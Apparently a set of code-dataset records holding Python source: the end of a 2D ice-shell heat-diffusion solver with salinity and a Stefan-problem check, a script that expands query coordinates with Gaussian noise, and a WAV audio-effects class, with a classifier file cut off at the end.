point\n\t\t\t\tself.removed_salt[-1] += (self.S[self.S >= self.saturation_point] - self.saturation_point).sum()\n\t\t\t\tself.mass_removed[-1] += vol * (self.S[self.geom].max() * self.C_rho + self.constants.rho_w) * \\\n\t\t\t\t self.removed_salt[-1] / vol / 1000\n\t\t\t\tself.ppt_removed[-1] += self.removed_salt[-1] / vol\n\n\t\t\t\t# ensure liquid hits only the saturation concentration\n\t\t\t\tself.S[self.S > self.saturation_point] = self.saturation_point\n\n\t\t\t# check mass conservation\n\t\t\ttotal_S_new = self.S.sum() + np.asarray(self.removed_salt).sum()\n\t\t\tif abs(total_S_new - self.total_salt[0]) <= self.Stol:\n\t\t\t\tself.total_salt.append(total_S_new)\n\t\t\telse:\n\t\t\t\tself.total_salt.append(total_S_new)\n\t\t\t\traise Exception('Mass not being conserved')\n\n\t\t\t# outdated usage, may delete at some point\n\t\t\t# however, it can be used to stop simulation after liquid becomes saturated\n\t\t\tif (self.S[water] >= self.saturation_point).all() and water[0].sum() > 0:\n\t\t\t\treturn 1\n\t\t\telse:\n\t\t\t\treturn 0\n\n\tdef update_liquid_fraction(self, phi_last):\n\t\t\"\"\"Application of Huber et al., 2008 enthalpy method. Determines volume fraction of liquid/solid in a cell.\"\"\"\n\n\t\t# update melting temperature for enthalpy if salt is included in simulation\n\t\tif self.issalt:\n\t\t\tself.Tm = self.Tm_func(self.S, *self.Tm_consts[self.composition])\n\t\t# calculate new enthalpy of solid ice\n\t\tHs = self.cp_i * self.Tm # update entalpy of solid ice\n\t\tH = self.cp_i * self.T + self.constants.Lf * phi_last # calculate the enthalpy in each cell\n\t\t# update liquid fraction\n\t\tself.phi[H >= Hs] = (H[H >= Hs] - Hs[H >= Hs]) / self.constants.Lf\n\t\tself.phi[H <= Hs + self.constants.Lf] = (H[H <= Hs + self.constants.Lf] - Hs[\n\t\t\tH <= Hs + self.constants.Lf]) / self.constants.Lf\n\t\t# all ice\n\t\tself.phi[H < Hs] = 0.\n\t\t# all water\n\t\tself.phi[H > Hs + self.constants.Lf] = 1\n\n\tdef update_volume_averages(self):\n\t\t\"\"\"Updates volume averaged thermal properties.\"\"\"\n\n\t\tif self.kT:\n\t\t\tself.k = (1 - self.phi) * (self.constants.ac / self.T) + self.phi * self.constants.kw\n\t\telse:\n\t\t\tself.k = (1 - self.phi) * self.constants.ki + self.phi * self.constants.kw\n\n\t\tif self.cpT == \"GM89\":\n\t\t\t\"Use temperature-dependent specific heat for pure ice from Grimm & McSween 1989\"\n\t\t\tself.cp_i = 185. + 7.037 * self.T\n\t\telif self.cpT == \"CG10\":\n\t\t\t\"Use temperature-dependent specific heat for pure ice from Choukroun & Grasset 2010\"\n\t\t\tself.cp_i = 74.11 + 7.56 * self.T\n\t\telse:\n\t\t\tself.cp_i = self.constants.cp_i\n\n\t\tif self.issalt:\n\t\t\tself.rhoc = (1 - self.phi) * (self.constants.rho_i + self.Ci_rho * self.S) * self.cp_i + \\\n\t\t\t self.phi * (self.constants.rho_w + self.C_rho * self.S) * self.constants.cp_w\n\t\telif not self.issalt:\n\t\t\tself.rhoc = (1 - self.phi) * self.constants.rho_i * self.cp_i + \\\n\t\t\t self.phi * self.constants.rho_w * self.constants.cp_w\n\n\tdef update_sources_sinks(self, phi_last, T_last):\n\t\t\"\"\"Updates external heat or heat-sinks during simulation.\"\"\"\n\t\tself.latent_heat = self.constants.rho_i * self.constants.Lf * (self.phi - phi_last) / self.dt\n\n\t\tself.tidal_heat = 0\n\t\tif self.tidalheat:\n\t\t\t# ICE effective viscosity follows an Arrenhius law\n\t\t\t# viscosity = reference viscosity * exp[C/Tm * (Tm/T - 1)]\n\t\t\t# if cell is water, just use reference viscosity for pure ice at 0 K\n\t\t\tself.visc = (1 - phi_last) * self.constants.visc0i \\\n\t\t\t * np.exp(self.constants.Qs * (self.Tm / T_last - 1) / \\\n\t\t\t (self.constants.Rg * self.Tm)) \\\n\t\t\t + phi_last * self.constants.visc0w\n\t\t\tself.tidal_heat = (self.constants.eps0 ** 2 * self.constants.omega ** 2 * self.visc) / (\n\t\t\t\t\t2 + 2 * self.constants.omega ** 2 * self.visc ** 2 / (self.constants.G ** 2))\n\n\t\treturn self.tidal_heat - self.latent_heat\n\n\tdef apply_boundary_conditions(self, T_last, k_last, rhoc_last):\n\t\t\"\"\"Applies chosen boundary conditions during simulation run.\"\"\"\n\t\t# apply chosen boundary conditions at bottom of domain\n\t\tif self.botBC == True:\n\t\t\tself.T[-1, 1:-1] = self.TbotBC[1:-1]\n\n\t\telif self.botBC == 'Flux':\n\t\t\tT_bot_out = self.Tsurf * (self.Tbot / self.Tsurf) ** ((self.Lz + self.dz) / self.Lz)\n\t\t\tc = self.dt / (2 * rhoc_last[-1, 1:-1])\n\n\t\t\tTbotx = c / self.dx ** 2 * ((k_last[-1, 1:-1] + k_last[-1, 2:]) * (T_last[-1, 2:] - T_last[-1, 1:-1]) \\\n\t\t\t - (k_last[-1, 1:-1] + k_last[-1, :-2]) * (T_last[-1, 1:-1] - T_last[-1, :-2]))\n\t\t\tTbotz = c / self.dz ** 2 * (\n\t\t\t\t\t(k_last[-1, 1:-1] + self.constants.ac / T_bot_out) * (T_bot_out - T_last[-1, :-1]) \\\n\t\t\t\t\t- (k_last[-1, 1:-1] + k_last[-2, 1:-1]) * (T_last[-1, 1:-1] - T_last[-2, 1:-1]))\n\t\t\tself.T[-1, 1:-1] = T_last[-1, 1:-1] + Tbotx + Tbotz + self.Q[-1, 1:-1] * 2 * c\n\n\t\telif self.botBC == 'FluxI' or self.botBC == 'FluxW': # constant temperature ice\n\t\t\tc = self.dt / (2 * rhoc_last[-1, 1:-1])\n\n\t\t\tif self.botBC == 'FluxI':\n\t\t\t\tkbot = self.constants.ac / self.botT\n\t\t\telif self.botBC == 'FluxW':\n\t\t\t\tkbot = self.constants.kw\n\n\t\t\tTbotx = c / self.dx ** 2 * ((k_last[-1, 1:-1] + k_last[-1, 2:]) * (T_last[-1, 2:] - T_last[-1, 1:-1]) \\\n\t\t\t - (k_last[-1, 1:-1] + k_last[-1, :-2]) * (T_last[-1, 1:-1] - T_last[-1, :-2]))\n\t\t\tTbotz = c / self.dz ** 2 * ((k_last[-1, 1:-1] + kbot) * (self.botT - T_last[-1, 1:-1]) \\\n\t\t\t - (k_last[-1, 1:-1] + k_last[-2, 1:-1]) * (T_last[-1, 1:-1] - T_last[-2, 1:-1]))\n\t\t\tself.T[-1, 1:-1] = T_last[-1, 1:-1] + Tbotx + Tbotz + self.Q[-1, 1:-1] * 2 * c\n\n\t\t# apply chosen boundary conditions at top of domain\n\t\tif self.topBC == True:\n\t\t\tself.T[0, 1:-1] = self.TtopBC[1:-1]\n\n\t\telif self.topBC == 'Flux':\n\t\t\tT_top_out = self.Tsurf * (self.Tbot / self.Tsurf) ** (-self.dz / self.Lz)\n\n\t\t\tif self.cpT is True:\n\t\t\t\tCbc = rhoc_last[0, 1:-1] / (self.constants.rho_i * (185. + 2 * 7.037 * T_top_out))\n\t\t\telse:\n\t\t\t\tCbc = 1\n\t\t\tc = self.dt / (2 * rhoc_last[0, 1:-1])\n\t\t\tTtopx = c / self.dx ** 2 * ((k_last[0, 1:-1] + k_last[0, 2:]) * (T_last[0, 2:] - T_last[0, 1:-1]) \\\n\t\t\t - (k_last[0, 1:-1] + k_last[0, :-2]) * (T_last[0, 1:-1] - T_last[0, :-2]))\n\t\t\tTtopz = c / self.dz ** 2 * ((k_last[0, 1:-1] + k_last[1, 1:-1]) * (T_last[1, 1:-1] - T_last[0, 1:-1]) \\\n\t\t\t - (k_last[0, 1:-1] + Cbc * self.constants.ac / T_top_out) * (\n\t\t\t\t\t T_last[0, 1:-1] - T_top_out))\n\t\t\tself.T[0, 1:-1] = T_last[0, 1:-1] + Ttopx + Ttopz + self.Q[0, 1:-1] * 2 * c\n\n\t\telif self.topBC == 'Radiative':\n\t\t\tc = self.dt / (2 * rhoc_last[0, :])\n\t\t\trad = self.dz * self.constants.stfblt * self.constants.emiss * (T_last[0, :] ** 4 - self.Tsurf ** 4)\n\t\t\tTtopz = c / self.dz ** 2 * ((k_last[0, :] + k_last[1, :]) * (T_last[1, :] - T_last[0, :]) \\\n\t\t\t - (self.k_initial[0, :] + self.k_initial[1, :]) * (\n\t\t\t\t\t self.T_initial[1, :] - self.Tsurf))\n\t\t\tTtopx = 1 / self.dx ** 2 * ((k_last[0, 1:-1] + k_last[0, 2:]) * (T_last[0, 2:] - T_last[0, 1:-1]) \\\n\t\t\t - (k_last[0, 1:-1] + k_last[0, :-2]) * (T_last[0, 1:-1] - T_last[0, :-2]))\n\n\t\t\tself.T[0, :] = T_last[0, :] + Ttopz - rad * c / self.dz ** 2\n\t\t\tself.T[0, 1:-1] += (Ttopx + self.Q[0, 1:-1] * 2) * self.dt / (2 * rhoc_last[0, 1:-1])\n\t\t# else:\n\t\t#\tself.T[0, 1:-1] = self.Tsurf\n \n\t\t# apply chosen boundary conditions at sides of domain\n\t\tif self.sidesBC == True:\n\t\t\tself.T[:, 0] = self.Tedge.copy()\n\t\t\tself.T[:, self.nx - 1] = self.Tedge.copy()\n\n\t\telif self.sidesBC == 'NoFlux':\n\t\t\tself.T[:, 0] = self.T[:, 1].copy()\n\t\t\tself.T[:, -1] = self.T[:, -2].copy()\n\n\t\telif self.sidesBC == 'RFlux':\n\t\t\t# left side of domain uses 'NoFlux'\n\t\t\tself.T[:, 0] = T_last[:, 1].copy()\n\n\t\t\t# right side of domain\n\t\t\tc = self.dt / (2 * rhoc_last[1:-1, -1])\n\t\t\tTRX = c * ((k_last[1:-1, -1] + self.constants.ac / self.Tedge[1:-1]) * \\\n\t\t\t (self.Tedge[1:-1] - T_last[1:-1, -1]) / self.dx \\\n\t\t\t - (k_last[1:-1, -1] + k_last[1:-1, -2]) * (T_last[1:-1, -1] - T_last[1:-1, -2]) / self.dL)\n\n\t\t\tTRZ = c * ((k_last[1:-1, -1] + k_last[2:, -1]) * (T_last[2:, -1] - T_last[1:-1, -1]) \\\n\t\t\t - (k_last[1:-1, -1] + k_last[:-2, -1]) * (T_last[1:-1, -1] - T_last[:-2, -1])) / self.dz ** 2\n\n\t\t\tself.T[1:-1, -1] = T_last[1:-1, -1] + TRX + TRZ + self.Q[1:-1, -1] * 2 * c\n\n\tdef get_gradients(self, T_last):\n\t\t# constant in front of x-terms\n\t\tCx = self.dt / (2 * self.rhoc[1:-1, 1:-1] * self.dx ** 2)\n\t\t# temperature terms in x direction\n\t\tTx = Cx * ((self.k[1:-1, 1:-1] + self.k[1:-1, 2:]) * (T_last[1:-1, 2:] - T_last[1:-1, 1:-1]) \\\n\t\t - (self.k[1:-1, 1:-1] + self.k[1:-1, :-2]) * (T_last[1:-1, 1:-1] - T_last[1:-1, :-2]))\n\t\t# constant in front of z-terms\n\t\tCz = self.dt / (2 * self.rhoc[1:-1, 1:-1] * self.dz ** 2)\n\t\t# temperature terms in z direction\n\t\tTz = Cz * ((self.k[1:-1, 1:-1] + self.k[2:, 1:-1]) * (T_last[2:, 1:-1] - T_last[1:-1, 1:-1]) \\\n\t\t - (self.k[1:-1, 1:-1] + self.k[:-2, 1:-1]) * (T_last[1:-1, 1:-1] - T_last[:-2, 1:-1]))\n\t\treturn Tx, Tz\n\n\tdef print_all_options(self, nt):\n\t\t\"\"\"Prints options chosen for simulation.\"\"\"\n\n\t\tdef stringIO(bin):\n\t\t\tif bin:\n\t\t\t\treturn 'on'\n\t\t\telse:\n\t\t\t\treturn 'off'\n\n\t\tdef stringBC(BC):\n\t\t\tif isinstance(BC, str):\n\t\t\t\treturn BC\n\t\t\telif BC:\n\t\t\t\treturn 'Dirichlet'\n\n\t\tprint('Starting simulation with\\n-------------------------')\n\t\tprint('\\t total model time: {}s, {}yr'.format(nt * self.dt, (nt * self.dt) / self.constants.styr))\n\t\tprint('\\t dt = {} s'.format(self.dt))\n\t\tprint('\\t Ice shell thickness: {} m'.format(self.Lz))\n\t\tprint('\\t Lateral domain size: {} m'.format(self.Lx))\n\t\tprint('\\t dz = {} m; dx = {} m'.format(self.dz, self.dx))\n\t\tprint('\\t surface temperature: {} K'.format(self.Tsurf))\n\t\tprint('\\t bottom temperature: {} K'.format(self.Tbot))\n\t\tprint('\\t boundary conditions:')\n\t\tprint('\\t top: {}'.format(stringBC(self.topBC)))\n\t\tprint('\\t bottom: {}'.format(stringBC(self.botBC)))\n\t\tprint('\\t sides: {}'.format(stringBC(self.sidesBC)))\n\t\tprint('\\t sources/sinks:')\n\t\tprint('\\t tidal heating: {}'.format(stringIO(self.tidalheat)))\n\t\tprint('\\t latent heat: {}'.format(stringIO(self.latentheat)))\n\t\tprint('\\t tolerances:')\n\t\tprint('\\t temperature: {}'.format(self.Ttol))\n\t\tprint('\\t liquid fraction: {}'.format(self.phitol))\n\t\tif self.issalt:\n\t\t\tprint('\\t salinity: {}'.format(self.Stol))\n\t\tprint('\\t thermal properties:')\n\t\tprint('\\t ki(T): {}'.format(stringIO(self.kT)))\n\t\tprint('\\t ci(T): {}'.format(stringIO(self.cpT)))\n\t\tprint('\\t intrusion/salt:')\n\t\ttry:\n\t\t\tself.geom\n\t\t\tprint(f'\\t radius: {self.R_int}m')\n\t\t\tprint(f'\\t thickness: {self.thickness}m')\n\t\t\tprint(f'\\t depth: {self.depth}m')\n\t\texcept:\n\t\t\tpass\n\t\tprint('\\t salinity: {}'.format(stringIO(self.issalt)))\n\t\tif self.issalt:\n\t\t\tprint(f'\\t composition: {self.composition}')\n\t\t\tprint(f'\\t concentration: {self.concentration}ppt')\n\t\tprint('\\t other:')\n\t\tprint(f'\\t stop on freeze: {stringIO(self.freezestop)}')\n\t\tprint('-------------------------')\n\t\ttry:\n\t\t\tprint('Requested outputs: {}'.format(list(self.outputs.transient_results.keys())))\n\t\texcept AttributeError:\n\t\t\tprint('no outputs requested')\n\n\n\tdef solve_heat(self, nt, dt, print_opts=True, n0=0):\n\t\t\"\"\"\n\t\tIteratively solve heat two-dimension heat diffusion problem with temperature-dependent conductivity of ice.\n\t\tParameters:\n\t\t\tnt : int\n\t\t\t\tnumber of time steps to take\n\t\t\tdt : float\n\t\t\t\ttime step, s\n\t\t\tprint_opts: bool\n\t\t\t\twhether to call print_opts() function above to print all chosen options\n\t\t\tn0 : float\n\t\t\t\tuse if not starting simulation from nt=0, generally used for restarting a simulation (see\n\t\t\t\trestart_simulation.py)\n\n\t\tUsage:\n\t\t\tRun simulation for 1000 time steps with dt = 300 s\n\t\t\t\tmodel.solve_heat(nt=1000, dt=300)\n\t\t\"\"\"\n\t\tself.dt = dt\n\t\tstart_time = _timer_.clock()\n\t\tself.num_iter = []\n\t\tif print_opts: self.print_all_options(nt)\n\n\t\tfor n in range(n0, n0 + nt):\n\t\t\tTErr, phiErr = np.inf, np.inf\n\t\t\tT_last, phi_last = self.T.copy(), self.phi.copy()\n\t\t\tk_last, rhoc_last = self.k.copy(), self.rhoc.copy()\n\t\t\titer_k = 0\n\t\t\twhile (TErr > self.Ttol and phiErr > self.phitol):\n\n\t\t\t\tTx, Tz = self.get_gradients(T_last)\n\t\t\t\tself.update_liquid_fraction(phi_last=phi_last)\n\t\t\t\tif self.issalt: self.saturated = self.update_salinity(phi_last=phi_last)\n\t\t\t\tself.update_volume_averages()\n\t\t\t\tself.Q = self.update_sources_sinks(phi_last=phi_last, T_last=T_last)\n\n\t\t\t\tself.T[1:-1, 1:-1] = T_last[1:-1, 1:-1] + Tx + Tz\n\t\t\t\tself.T += self.Q * self.dt / rhoc_last\n\n\t\t\t\tself.apply_boundary_conditions(T_last, k_last, rhoc_last)\n\n\t\t\t\tTErr = (abs(self.T[1:-1, 1:-1] - T_last[1:-1, 1:-1])).max()\n\t\t\t\tphiErr = (abs(self.phi[1:-1, 1:-1] - phi_last[1:-1, 1:-1])).max()\n\n\t\t\t\t# kill statement when parameters won't allow solution to converge\n\t\t\t\tif iter_k > 2000:\n\t\t\t\t\traise Exception('solution not converging')\n\n\t\t\t\titer_k += 1\n\t\t\t\tT_last, phi_last = self.T.copy(), self.phi.copy()\n\t\t\t\tk_last, rhoc_last = self.k.copy(), self.rhoc.copy()\n\t\t\t# outputs here\n\t\t\tself.num_iter.append(iter_k)\n\t\t\tself.model_time += self.dt\n\n\t\t\ttry: # save outputs\n\t\t\t\tself.outputs.get_results(self, n=n)\n\t\t\t# this makes the runs incredibly slow and is really not super useful, but here if needed\n\t\t\t# save_data(self, 'model_runID{}.pkl'.format(self.outputs.tmp_data_file_name.split('runID')[1]),\n\t\t\t# self.outputs.tmp_data_directory, final=0)\n\t\t\texcept AttributeError: # no outputs chosen\n\t\t\t\tpass\n\n\t\t\tif self.freezestop: # stop if no liquid remains\n\t\t\t\tif (self.phi[self.geom] == 0).all():\n\t\t\t\t\tprint('instrusion frozen at {0:0.04f}s'.format(self.model_time))\n\t\t\t\t\tself.run_time = _timer_.clock() - start_time\n\t\t\t\t\treturn self.model_time\n\n\t\t# del T_last, phi_last, Tx, Tz, iter_k, TErr, phiErr\n\n\t\tself.run_time = _timer_.clock() - start_time\n\n\tclass stefan:\n\t\t\"\"\"\n\t\tAnalytical two-phase heat diffusion problem for comparison with model results.\n\t\t(See https://en.wikipedia.org/wiki/Stefan_problem)\n\t\t\"\"\"\n\n\t\tdef solution(self, t, Ti, Tw=273.15):\n\t\t\t\"\"\"\n\t\t\tAnalytical solution to the two-phase Stefan Problem for freezing\n\t\t\tParameters:\n\t\t\t\tt : float\n\t\t\t\t\ttime, s\n\t\t\t\tTi : float\n\t\t\t\t\ttemperature of solid ice, K\n\t\t\t\tTw : float\n\t\t\t\t\ttemperature of liquid (generally at freezing temperature), K\n\t\t\t'Returns':\n\t\t\t\tstefan.zm : float\n\t\t\t\t\tmelting/freezing front position at time t\n\t\t\t\tstefan.zm_func : function object\n\t\t\t\t\tmelting/freezing front position as a function of time\n\t\t\t\t\t\tUsage: t = array(0, 1e6) # s; zm = stefan.zm_func(t)\n\t\t\t\tstefan.zm_const : float\n\t\t\t\t\tconstant for the melting/freezing front position,i.e. 2 * lam * sqrt(kappa)\n\t\t\t\tstefan.zi : array\n\t\t\t\t\tarray of position values from 0 to the melting/freezing front problem (0 < z < zm), for use with\n\t\t\t\t\tstefan.T\n\t\t\t\tstefan.Ti : array\n\t\t\t\t\ttemperature profile of ice (Ti) at time t along position z\n\t\t\t\tstefan.zw : array\n\t\t\t\t\tarray of position values from the freezing front position zm to the domain size (zm < z < Lz)\n\t\t\t\tstefan.Tw : array\n\t\t\t\t\ttemperature profile of water (Tw) at time t along position z\n\n\t\t\tUsage:\n\t\t\t\t\tmodel.stefan.solution(model, t=1e6, Ti=100, Tw=273.15)\n\t\t\t\"\"\"\n\t\t\t# ice properties are constant\n\t\t\tKi = self.constants.ki / (self.constants.rho_i * self.constants.cp_i)\n\t\t\tKw = self.constants.kw / (self.constants.rho_w * self.constants.cp_w)\n\t\t\tv = np.sqrt(Ki / Kw)\n\t\t\tSti = self.constants.cp_i * (self.constants.Tm - Ti) / self.constants.Lf\n\t\t\tStw = self.constants.cp_w * (Tw - self.constants.Tm) / self.constants.Lf\n\n\t\t\tfunc = lambda x: Sti / (np.exp(x ** 2) * erf(x)) \\\n\t\t\t - v * self.constants.kw * self.constants.cp_i * Stw \\\n\t\t\t / (self.constants.ki * self.constants.cp_w * erfc(v * x) * np.exp(x ** 2 * v ** 2)) \\\n\t\t\t - x * np.sqrt(np.pi)\n\t\t\tlam = optimize.root(func, 1)['x'][0]\n\n\t\t\tself.stefan.zm_const = 2 * lam * np.sqrt(Ki)\n\t\t\tself.stefan.zm = self.stefan.zm_const * np.sqrt(t)\n\t\t\tdef zm_func(t):\n\t\t\t\treturn 2 * lam * np.sqrt(Ki * t)\n\t\t\tself.stefan.zm_func = zm_func\n\t\t\tself.stefan.zi = np.linspace(0, self.stefan.zm, int(self.stefan.zm / self.dz))\n\t\t\tself.stefan.Ti = Ti + (self.constants.Tm - Ti) * erf(self.stefan.zi / np.sqrt(4 * Ki * t)) / erf(lam)\n\t\t\tself.stefan.zw = np.linspace(self.stefan.zm, self.Lz, int((self.Lz - self.stefan.zm) / self.dz))\n\t\t\tself.stefan.Tw = Tw - (Tw - self.constants.Tm) * erfc(self.stefan.zw / np.sqrt(4 * Kw * t)) / erfc(v * lam)\n\n\t\tdef compare(self, dt, stop=0.9):\n\t\t\t\"\"\"\n\t\t\tRuns a simulation of the Stefan problem to ensure discretization is correct\n\t\t\tParameters:\n\t\t\t\tdt : float\n\t\t\t\t\ttime step, s\n\t\t\t\tstop : float\n\t\t\t\t\tpercent of domain that is melted/frozen at which to stop the simulation\n\t\t\tUsage:\n\t\t\t\tmodel.stefan.compare(0.1, stop=0.5)\n\t\t\t\"\"\"\n\t\t\tself.dt = dt\n\t\t\tself.model_time = 0\n\t\t\tself.set_boundaryconditions(top=True, bottom=True, sides='NoFlux')\n\t\t\tself.outputs.get_results(self, n=0)\n\t\t\tn = 1\n\t\t\tfflast = 0\n\t\t\tself.num_iter = []\n\t\t\ttmp = np.where(self.phi > 0)\n\t\t\tff = min(tmp[0]) * self.dz\n\t\t\tstrt = _timer_.time()\n\t\t\twhile ff < stop * self.Lz:\n\t\t\t\tTErr, phiErr = np.inf, np.inf\n\t\t\t\tT_last, phi_last = self.T.copy(), self.phi.copy()\n\t\t\t\tk_last, rhoc_last = self.k.copy(), self.rhoc.copy()\n\t\t\t\titer_k = 0\n\t\t\t\twhile (TErr > self.Ttol and phiErr > self.phitol):\n\n\t\t\t\t\tTx, Tz = self.get_gradients(T_last)\n\t\t\t\t\tself.update_liquid_fraction(phi_last=phi_last)\n\t\t\t\t\tself.update_volume_averages()\n\t\t\t\t\tself.Q = self.update_sources_sinks(phi_last=phi_last, T_last=T_last)\n\n\t\t\t\t\tself.T[1:-1, 1:-1] = T_last[1:-1, 1:-1] + Tx + Tz\n\t\t\t\t\tself.T += self.Q * self.dt / rhoc_last\n\n\t\t\t\t\tself.apply_boundary_conditions(T_last, k_last, rhoc_last)\n\n\t\t\t\t\tTErr = (abs(self.T[1:-1, 1:-1] - T_last[1:-1, 1:-1])).max()\n\t\t\t\t\tphiErr = (abs(self.phi[1:-1, 1:-1] - phi_last[1:-1, 1:-1])).max()\n\n\t\t\t\t\t# kill statement when parameters won't allow solution to converge\n\t\t\t\t\tif iter_k > 1000:\n\t\t\t\t\t\traise Exception('solution not converging')\n\n\t\t\t\t\titer_k += 1\n\t\t\t\t\tT_last, phi_last = self.T.copy(), self.phi.copy()\n\t\t\t\t\tk_last, rhoc_last = self.k.copy(), self.rhoc.copy()\n\n\t\t\t\t# outputs here\n\t\t\t\tself.outputs.get_results(self, n=n)\n\t\t\t\tself.model_time += self.dt\n\t\t\t\tself.num_iter.append(iter_k)\n\n\t\t\t\tn += 1\n\t\t\t\ttmp = np.where(self.phi == 0)\n\t\t\t\tff = max(tmp[0]) * self.dz\n\t\t\t\tif ff / self.Lz in [.10, .20, .30, .40, .50, .60, .70, .80, .90]:\n\t\t\t\t\tif ff != fflast: print('\\t {}% frozen at {}s'.format(ff / self.Lz * 100, self.model_time))\n\t\t\t\t\tfflast = ff\n\t\t\tself.run_time = _timer_.time() - strt\n\t\t\tself.stefan.solution(self, t=n * self.dt, Ti=self.Tsurf, Tw=self.Tbot)\n","sub_path":"HeatSolver.py","file_name":"HeatSolver.py","file_ext":"py","file_size_in_byte":31371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"403638132","text":"import numpy as np\n\nbase = 'queries-ca-restaurants-2'\ninfile = base + '.csv'\noutfile = base + '_extended.csv'\ninfile_len = 6992\n\nscale = 0.5\ntotal_points = 1000000000 # 1 billion queries\npoints_per_node = int(np.ceil(total_points / infile_len))\nprint(points_per_node, points_per_node * infile_len)\ngauss_x = np.random.normal(0, scale, size=points_per_node)\ngauss_y = np.random.normal(0, scale, size=points_per_node)\npoints = list(zip(gauss_x, gauss_y))\n\ninf = open(infile, 'r')\nlines = [l.strip().split(',') for l in inf.readlines()]\nnodes = [(float(x[0]), float(x[1])) for x in lines]\n\nwith open(outfile, 'w') as nf:\n for n in nodes:\n for p in points:\n nf.write('%f,%f\\n' % (p[0] + n[0], p[1] + n[1]))\n","sub_path":"data/kdtree/expand-nodes.py","file_name":"expand-nodes.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"324669909","text":"import numpy as np\nimport wavio\nimport simpleaudio as sa\n\n\nclass WavFile:\n \"\"\"Class representing a .WAV file\n\n file: path to the .wav file\n \"\"\"\n def __init__(self, file = \"\"):\n \"\"\"Read the audio file and save all the important data\"\"\"\n\n self.fileName = file\n \n if file != \"\":\n self.wav = wavio.read(file)\n\n # framerate\n self.fs = self.wav.rate\n\n # number of bytes per sample\n self.bytes = self.wav.sampwidth\n\n # track data\n self.data = np.array(self.wav.data)\n\n #track data as float\n self.floatData = int_to_float(self.data, self.bytes)\n\n # dimensions of the data which is (nSamples, nChannels)\n # nSamples: number of samples in a file\n # nChannels: number of channels, 1 - mono, 2 - stereo\n (self.nSamples, self.nChannels) = np.shape(self.data)\n\n # length of a file in seconds\n self.length = self.nSamples / self.fs\n\n \n def get_track_name(self):\n \"\"\"Return a track name 'name.wav' \"\"\"\n lastSlashIndex = self.fileName.rfind('/')\n\n return self.fileName[lastSlashIndex + 1:]\n\n\n def get_track_length(self):\n \"\"\"Return a string in a format 'hh/mm/ss' \"\"\"\n h = int(self.length / 3600)\n m = int((self.length - h * 3600) / 60)\n s = int(self.length - h * 3600 - m * 60)\n\n hStr, mStr, sStr = \"\", \"\", \"\"\n\n if h == 0:\n hStr = \"00\"\n elif h > 9:\n hStr = str(h)\n else:\n hStr = \"0\"+str(h)\n\n if m == 0:\n mStr = \"00\"\n elif m > 9:\n mStr = str(m)\n else:\n mStr = \"0\"+str(m)\n\n if s == 0:\n sStr = \"00\"\n elif s > 9:\n sStr = str(s)\n else:\n sStr = \"0\"+str(s)\n\n time = hStr + \":\" + mStr + \":\" + sStr\n return time\n\n\n def play(self):\n \"\"\"Play the sound\"\"\"\n play = sa.play_buffer(self.data, self.nChannels, self.bytes, self.fs)\n\n\n def stop(self):\n \"\"\"Stop all sounds\"\"\"\n sa.stop_all()\n\n\n def write_to_file(self, file):\n \"\"\"Save file in a .wav format\"\"\"\n wavio.write(file, self.data, self.fs, scale = 'none', sampwidth = self.bytes)\n\n \n def echo_effect(self, delay, decayFactor ):\n \"\"\"Add echo effect\n\n delay[s]: >0.0\n decayFactor: 0-1 \n \"\"\"\n # convert delay in seconds to delay in number of samples\n delaySamples = int(delay * self.fs)\n\n tempData = np.empty(np.shape(self.floatData), dtype = np.float)\n\n for i in range(0, self.nSamples):\n \n if i >= delaySamples:\n tempData[i] = self.floatData[i] + decayFactor * self.floatData[i - delaySamples]\n else:\n tempData[i] = self.floatData[i]\n\n self.floatData = tempData\n self.data = float_to_int16(tempData)\n\n\n def distortion_effect(self, inputGain):\n \"\"\"Add distortion effect (implemented with an exponential function)\n\n inputGain: 2-20\n \"\"\" \n\n tempData = np.empty(np.shape(self.floatData), dtype = np.float)\n\n for i in range(self.nSamples):\n \n sign = np.sign(self.floatData[i])\n tempData[i] = sign * (1 - np.exp(-np.abs(self.floatData[i] * inputGain)))\n\n self.floatData = tempData\n self.data = float_to_int16(tempData)\n\n\n def tremolo_effect(self, depth, fLFO):\n \"\"\"Add tremolo effect\n \n depth: 0-1\n fLFO(Hz): 2-10\n \"\"\"\n\n fNorm = 2 * np.pi * fLFO / self.fs;\n\n tempData = np.empty(np.shape(self.floatData), dtype = np.float)\n\n for i in range(0, self.nSamples):\n tempData[i] = self.floatData[i] * (1 + depth * np.cos(fNorm * i))\n\n self.floatData = tempData\n self.data = float_to_int16(tempData)\n\n\n def flanging_effect(self, delay, oscRange, fSweep):\n \"\"\"Add flanging effect\n \n delay(ms): 0.025-2\n oscRange: 10-200\n fSweep(Hz): 0.25-2\n \"\"\"\n \n delaySamples = round(delay / 1000 * self.fs);\n \n fNorm = 2 * np.pi * fSweep/self.fs;\n\n tempData = np.empty(np.shape(self.floatData), dtype = np.float)\n\n for i in range(0, self.nSamples-delaySamples-oscRange):\n \n tempData[i] = self.floatData[i] + self.floatData[i+delaySamples+int(round(oscRange*np.sin(fNorm * i)))]\n\n self.floatData = tempData\n self.data = float_to_int16(tempData)\n\n\n\ndef int_to_float(intArray, nBytes):\n \"\"\"Convert an int array to a float array\"\"\"\n \n floatArray = np.empty(np.shape(intArray), dtype = np.float)\n floatArray = intArray / 2 ** (8 * nBytes - 1)\n\n return floatArray\n\n\ndef float_to_int16(floatArray):\n \"\"\"Convert a float array to an int16 array\"\"\"\n\n intArray = np.empty(np.shape(floatArray), dtype = np.int16)\n\n arrayMax = np.amax(floatArray)\n arrayMin = np.amin(floatArray)\n scaleFactor = arrayMax if arrayMax >= np.abs(arrayMin) else np.abs(arrayMin)\n\n intArray = (floatArray / scaleFactor * 2**15).astype(np.int16)\n\n return intArray","sub_path":"WavUtils.py","file_name":"WavUtils.py","file_ext":"py","file_size_in_byte":5217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"60667325","text":"import json\nimport warnings\n\nimport numpy as np\nimport pandas as pd\nfrom pandas.core.common import SettingWithCopyWarning\nfrom sklearn.neighbors import KNeighborsClassifier\n\nfrom ImageFeaturesDto import ImageFeaturesDto\nfrom ResourceProviders.TrainPathProvider import TrainPathProvider\nfrom TrainMarksProvider import TrainMarksProvider\n\nwarnings.simplefilter(action=\"ignore\", category=SettingWithCopyWarning)\n\n\nclass ClassifireCreator:\n def __init__(self):\n self.train_marks_provider = 